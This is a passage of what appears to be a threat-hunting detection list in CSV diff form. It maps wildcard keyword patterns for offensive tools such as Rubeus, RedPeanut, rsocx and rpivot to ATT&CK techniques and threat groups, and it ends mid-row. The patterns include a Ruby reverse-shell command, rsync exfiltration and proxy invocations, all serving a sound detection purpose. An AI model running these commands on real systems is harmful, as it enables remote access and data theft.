+"*rpivot.zip*","offensive_tool_keyword","rpivot","socks4 reverse proxy for penetration testing","T1090.004 - T1572 - T1021.001","TA0011 - TA0002 - TA0040","N/A","N/A","C2","https://github.com/klsecservices/rpivot","1","1","N/A","10","10","490","125","2018-07-12T09:53:13Z","2016-09-07T17:25:57Z"
+"*rpivot-master*","offensive_tool_keyword","rpivot","socks4 reverse proxy for penetration testing","T1090.004 - T1572 - T1021.001","TA0011 - TA0002 - TA0040","N/A","N/A","C2","https://github.com/klsecservices/rpivot","1","1","N/A","10","10","490","125","2018-07-12T09:53:13Z","2016-09-07T17:25:57Z"
+"*rpm.torproject.org/*public_gpg.key*","offensive_tool_keyword","torproject","Browse Privately. Explore Freely. Defend yourself against tracking and surveillance.
Circumvent censorship.","T1090 - T1134 - T1188 - T1307 - T1497 - T1560","TA0001 - TA0002 - TA0005 - TA0011","N/A","N/A","Data Exfiltration","torproject.org","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"*rsactftool --*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z"
+"*rsactftool* --dumpkey --key *","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z"
+"*rshijack*","offensive_tool_keyword","rshijack","tcp connection hijacker. rust rewrite of shijack from 2001. This was written for TAMUctf 2018. brick house 100. The target was a telnet server that was protected by 2FA. Since the challenge wasn't authenticated. there have been multiple solutions for this. Our solution (cyclopropenylidene) was waiting until the authentication was done.
then inject a tcp packet into the telnet connection:","T1195 - T1565.001 - T1565.002 - T1574 - T1573 - T1071.004","TA0011 - TA0001","N/A","N/A","Sniffing & Spoofing","https://github.com/kpcyrd/rshijack","1","0","N/A","N/A","5","402","41","2023-06-03T16:37:11Z","2018-02-23T02:21:45Z"
+"*rsmudge/ElevateKit*","offensive_tool_keyword","cobaltstrike","The Elevate Kit demonstrates how to use third-party privilege escalation attacks with Cobalt Strike's Beacon payload.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/rsmudge/ElevateKit","1","1","N/A","10","10","813","205","2020-06-22T21:12:24Z","2016-12-08T03:51:09Z"
+"*rsocx -l 0.0.0.0*","offensive_tool_keyword","rsocx","A bind/reverse Socks5 proxy server.","T1090.001 - T1090.002 - T1071.001","TA0011 - TA0009 - TA0040","N/A","N/A","C2","https://github.com/b23r0/rsocx","1","0","N/A","10","10","319","146","2022-09-28T08:11:34Z","2015-05-13T04:02:55Z"
+"*rsocx -r *:*","offensive_tool_keyword","rsocx","A bind/reverse Socks5 proxy server.","T1090.001 - T1090.002 - T1071.001","TA0011 -
TA0009 - TA0040","N/A","N/A","C2","https://github.com/b23r0/rsocx","1","0","N/A","10","10","319","146","2022-09-28T08:11:34Z","2015-05-13T04:02:55Z"
+"*rsocx -t 0.0.0.0*","offensive_tool_keyword","rsocx","A bind/reverse Socks5 proxy server.","T1090.001 - T1090.002 - T1071.001","TA0011 - TA0009 - TA0040","N/A","N/A","C2","https://github.com/b23r0/rsocx","1","0","N/A","10","10","319","146","2022-09-28T08:11:34Z","2015-05-13T04:02:55Z"
+"*rsocx.exe* 0.0.0.0*","offensive_tool_keyword","rsocx","A bind/reverse Socks5 proxy server.","T1090.001 - T1090.002 - T1071.001","TA0011 - TA0009 - TA0040","N/A","N/A","C2","https://github.com/b23r0/rsocx","1","0","N/A","10","10","319","146","2022-09-28T08:11:34Z","2015-05-13T04:02:55Z"
+"*rsocx.exe* 127.0.0.1*","offensive_tool_keyword","rsocx","A bind/reverse Socks5 proxy server.","T1090.001 - T1090.002 - T1071.001","TA0011 - TA0009 - TA0040","N/A","N/A","C2","https://github.com/b23r0/rsocx","1","0","N/A","10","10","319","146","2022-09-28T08:11:34Z","2015-05-13T04:02:55Z"
+"*rsocx-main.zip*","offensive_tool_keyword","rsocx","A bind/reverse Socks5 proxy server.","T1090.001 - T1090.002 - T1071.001","TA0011 - TA0009 - TA0040","N/A","N/A","C2","https://github.com/b23r0/rsocx","1","1","N/A","10","10","319","146","2022-09-28T08:11:34Z","2015-05-13T04:02:55Z"
+"*rsync -r * *@*:*","greyware_tool_keyword","rsync","Detects the use of tools that copy files from or to remote systems","T1041 - T1105 - T1106","TA0002 - TA0008 - TA0010","N/A","N/A","Data Exfiltration","https://attack.mitre.org/techniques/T1105/","1","0","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A"
+"*rsync -r *@*:* *","greyware_tool_keyword","rsync","Detects the use of tools that copy files from or to remote systems","T1041 - T1105 - T1106","TA0002 - TA0008 - TA0010","N/A","N/A","Data Exfiltration","https://attack.mitre.org/techniques/T1105/","1","0","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A"
+"*RtlDallas/KrakenMask*","offensive_tool_keyword","KrakenMask","A sleep obfuscation tool is used to encrypt the content of the .text section with RC4 (using SystemFunction032). To achieve this encryption a ROP chain is employed with QueueUserAPC and NtContinue.","T1027 - T1027.002 - T1055 - T1055.011 - T1059 - T1059.003","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/RtlDallas/KrakenMask","1","1","N/A","9","2","144","28","2023-08-08T15:21:28Z","2023-08-05T19:24:36Z"
+"*RU5EVEhJU0ZJTEVUUkFOU01JU1NJT05FR1JFU1NBU1NFU1M=*","offensive_tool_keyword","Egress-Assess","Egress-Assess is a tool used to test egress data detection capabilities","T1561 - T1041 - T1558 - T1071 - T1074","TA0010 - TA0011 - TA0008","N/A","Darkhotel - DUBNIUM - Putter Panda","Exploitation tools","https://github.com/FortyNorthSecurity/Egress-Assess","1","0","can be used for data exfiltration simulation","8","6","546","141","2023-08-09T18:40:57Z","2014-12-10T13:39:11Z"
+"*rubber_ducky.py*","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","10","10","7843","1826","2023-08-28T13:08:08Z","2015-09-21T17:30:53Z"
+"*Rubeus*currentluid*","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license).
Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1558 - T1559 - T1078 - T1550","TA0002 - TA0003 - TA0007","N/A","N/A","Credential Access","https://github.com/GhostPack/Rubeus","1","0","N/A","N/A","10","3454","711","2023-09-25T09:48:31Z","2018-09-23T23:59:03Z"
+"*Rubeus*harvest*","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1558 - T1559 - T1078 - T1550","TA0002 - TA0003 - TA0007","N/A","N/A","Credential Access","https://github.com/GhostPack/Rubeus","1","0","N/A","N/A","10","3454","711","2023-09-25T09:48:31Z","2018-09-23T23:59:03Z"
+"*Rubeus*logonsession*","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1558 - T1559 - T1078 - T1550","TA0002 - TA0003 - TA0007","N/A","N/A","Credential Access","https://github.com/GhostPack/Rubeus","1","0","N/A","N/A","10","3454","711","2023-09-25T09:48:31Z","2018-09-23T23:59:03Z"
+"*Rubeus*monitor*","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license).
Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1558 - T1559 - T1078 - T1550","TA0002 - TA0003 - TA0007","N/A","N/A","Credential Access","https://github.com/GhostPack/Rubeus","1","0","N/A","N/A","10","3454","711","2023-09-25T09:48:31Z","2018-09-23T23:59:03Z"
+"*Rubeus.bin*","offensive_tool_keyword","inceptor","Template-Driven AV/EDR Evasion Framework","T1562.001 - T1059.003 - T1027.002 - T1070.004","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/klezVirus/inceptor","1","0","N/A","N/A","10","1357","243","2023-07-25T15:28:56Z","2021-08-02T15:35:57Z"
+"*Rubeus.Commands*","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1558 - T1559 - T1078 - T1550","TA0002 - TA0003 - TA0007","N/A","N/A","Credential Access","https://github.com/GhostPack/Rubeus","1","1","N/A","N/A","10","3454","711","2023-09-25T09:48:31Z","2018-09-23T23:59:03Z"
+"*Rubeus.exe*","offensive_tool_keyword","Executable_Files","Database for custom made as well as publicly available stage-2 or beacons or stageless payloads used by loaders/stage-1/stagers or for further usage of C2 as well","T1071 - T1071.001 - T1105 - T1041 - T1102","TA0011 - TA0005 - TA0010","N/A","N/A","Exploitation tools","https://github.com/reveng007/Executable_Files","1","0","N/A","10","1","7","2","2023-09-07T08:36:28Z","2021-12-10T15:04:35Z"
+"*Rubeus.exe*","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses.
It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1558 - T1559 - T1078 - T1550","TA0002 - TA0003 - TA0007","N/A","N/A","Credential Access","https://github.com/GhostPack/Rubeus","1","1","N/A","N/A","10","3454","711","2023-09-25T09:48:31Z","2018-09-23T23:59:03Z"
+"*Rubeus.exe*","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1076 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","1887","285","2023-09-23T03:34:27Z","2020-06-05T12:50:00Z"
+"*Rubeus.git*","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license).
Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1558 - T1559 - T1078 - T1550","TA0002 - TA0003 - TA0007","N/A","N/A","Credential Access","https://github.com/GhostPack/Rubeus","1","1","N/A","N/A","10","3454","711","2023-09-25T09:48:31Z","2018-09-23T23:59:03Z"
+"*Rubeus.Kerberos*","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1558 - T1559 - T1078 - T1550","TA0002 - TA0003 - TA0007","N/A","N/A","Credential Access","https://github.com/GhostPack/Rubeus","1","1","N/A","N/A","10","3454","711","2023-09-25T09:48:31Z","2018-09-23T23:59:03Z"
+"*Rubeus.lib*","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license).
Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1558 - T1559 - T1078 - T1550","TA0002 - TA0003 - TA0007","N/A","N/A","Credential Access","https://github.com/GhostPack/Rubeus","1","1","N/A","N/A","10","3454","711","2023-09-25T09:48:31Z","2018-09-23T23:59:03Z"
+"*rubeus.txt*","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","0","N/A","10","10","334","84","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z"
+"*RubeusAskTgtMenu*","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","0","N/A","10","10","334","84","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z"
+"*RubeusASREPRoastManager*","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","1","N/A","10","10","334","84","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z"
+"*RubeusChangePwManager*","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","1","N/A","10","10","334","84","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z"
+"*RubeusCreateNetOnlyManager*","offensive_tool_keyword","RedPeanut","RedPeanut is a small
RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","1","N/A","10","10","334","84","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z"
+"*RubeusDescribeManager*","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","1","N/A","10","10","334","84","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z"
+"*RubeusDumpManager*","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","1","N/A","10","10","334","84","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z"
+"*RubeusDumpMenu*","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","0","N/A","10","10","334","84","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z"
+"*RubeusHarvestManager*","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","1","N/A","10","10","334","84","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z"
+"*RubeusHarvestMenu*","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055
- T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","0","N/A","10","10","334","84","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z"
+"*RubeusHashManager*","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","1","N/A","10","10","334","84","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z"
+"*RubeusKerberoastManager*","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","1","N/A","10","10","334","84","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z"
+"*RubeusKerberoastMenu*","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","1","N/A","10","10","334","84","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z"
+"*RubeusKlistManager*","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","1","N/A","10","10","334","84","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z"
+"*RubeusManager*","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002
- TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","0","N/A","10","10","334","84","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z"
+"*RubeusMonitorManager*","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","1","N/A","10","10","334","84","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z"
+"*RubeusMonitorMenu*","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","0","N/A","10","10","334","84","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z"
+"*RubeusPttManager*","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","1","N/A","10","10","334","84","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z"
+"*RubeusPttMenu*","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","0","N/A","10","10","334","84","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z"
+"*RubeusPurgeManager*","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 -
TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","1","N/A","10","10","334","84","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z"
+"*RubeusPurgeMenu*","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","0","N/A","10","10","334","84","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z"
+"*RubeusRenewManager*","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","1","N/A","10","10","334","84","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z"
+"*RubeusRenewMenu*","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","0","N/A","10","10","334","84","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z"
+"*RubeusS4UManager*","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","1","N/A","10","10","334","84","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z"
+"*RubeusS4UMenu*","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 -
TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","0","N/A","10","10","334","84","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z"
+"*RubeusTgtDelegManager*","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","1","N/A","10","10","334","84","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z"
+"*RubeusTgtDelegMenu*","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","0","N/A","10","10","334","84","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z"
+"*RubeusTriageManager*","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","1","N/A","10","10","334","84","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z"
+"*ruby CVE-202*-*.rb *","offensive_tool_keyword","POC","CVE-2023-34362: MOVEit Transfer Unauthenticated RCE","T1190.001 - T1210.002 - T1068 - T1059.001 - T1059.003","TA0005 - TA0001 - TA0002 - TA0043","N/A","N/A","Exploitation tools","https://github.com/sfewer-r7/CVE-2023-34362","1","0","N/A","N/A","1","62","24","2023-06-13T08:46:03Z","2023-06-12T12:56:12Z"
+"*ruby poc-cve-202*-*.rb*","offensive_tool_keyword","POC","CVE-2023-34362: MOVEit Transfer Unauthenticated RCE","T1190.001 - T1210.002 - T1068 - T1059.001 - T1059.003","TA0005 - TA0001 - TA0002 - TA0043","N/A","N/A","Exploitation
tools","https://github.com/sfewer-r7/CVE-2023-34362","1","0","N/A","N/A","1","62","24","2023-06-13T08:46:03Z","2023-06-12T12:56:12Z" +"*ruby -rsocket *TCPSocket.open(*exec sprintf*/bin/sh -i *","greyware_tool_keyword","ruby","ruby reverse shell","T1071 - T1071.004 - T1021","TA0002 - TA0011","N/A","N/A","C2","https://github.com/RoseSecurity/Red-Teaming-TTPs/blob/main/Linux.md","1","0","N/A","10","9","890","121","2023-10-03T19:54:40Z","2021-08-16T17:34:25Z" +"*ruby_nntpd_cmd_exec*","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","N/A","Frameworks","https://github.com/beefproject/beef","1","1","N/A","N/A","10","8796","2026","2023-09-30T17:06:35Z","2011-11-23T06:53:25Z" +"*ruby_no_sh_reverse_tcp.py*","offensive_tool_keyword","Villain","Villain is a C2 framework that can handle multiple TCP socket & HoaxShell-based reverse shells. enhance their functionality with additional features (commands. utilities etc) and share them among connected sibling servers (Villain instances running on different machines).","T1021 - T1043 - T1055 - T1071 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/t3l3machus/Villain","1","1","N/A","10","10","3255","534","2023-08-08T06:24:24Z","2022-10-25T22:02:59Z" +"*ruby_reverse_tcp.py*","offensive_tool_keyword","Villain","Villain is a C2 framework that can handle multiple TCP socket & HoaxShell-based reverse shells. enhance their functionality with additional features (commands. 
